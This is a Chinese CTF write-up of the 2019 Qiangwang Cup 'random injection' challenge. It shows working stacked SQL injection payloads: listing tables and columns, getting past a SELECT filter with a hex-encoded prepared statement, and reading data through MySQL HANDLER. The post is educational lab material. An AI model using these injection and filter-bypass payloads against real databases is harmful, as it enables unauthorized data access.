首页 > 其他分享 >强网杯 2019 随便注

强网杯 2019 随便注

时间:2022-12-14 17:33:45浏览次数:63  
标签:read 随便 强网杯 点击 handler 2019 select

题目链接

https://buuoj.cn/challenges#[强网杯 2019]随便注

解题过程

该题中,在使用 union select 查询显位符时,发现程序过滤了 select:
image
经过各种尝试都没法绕过,其实这题需要用到堆叠注入,即使用 ; 注入多条语句,使用如下命令查询到两个表:

点击查看代码
1';show tables;#

image
需要注意,表名为数字时,需要用反引号包裹进行查询!!(又他妈的一个小细节)

点击查看代码
1';show columns from `1919810931114514`;#

image
对于 flag 字段,直接 select 表是不行滴,因为 select 已经被过滤了,看大佬的 WriteUp,又学到了:

十六进制编码绕过
点击查看代码
1';SET@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
使用 SET 对变量 a 赋值,prepare from 是预处理语句,会进行编码转换,然后通过 execute 执行创建的预处理:

image

handler 查询
点击查看代码
handler 表名 open as t;handler t read first;handler t read next;handler t close;
1';handler `1919810931114514` open as t;handler t read first;#

标签:read,随便,强网杯,点击,handler,2019,select
From: https://www.cnblogs.com/F0x1tz/p/16982743.html

相关文章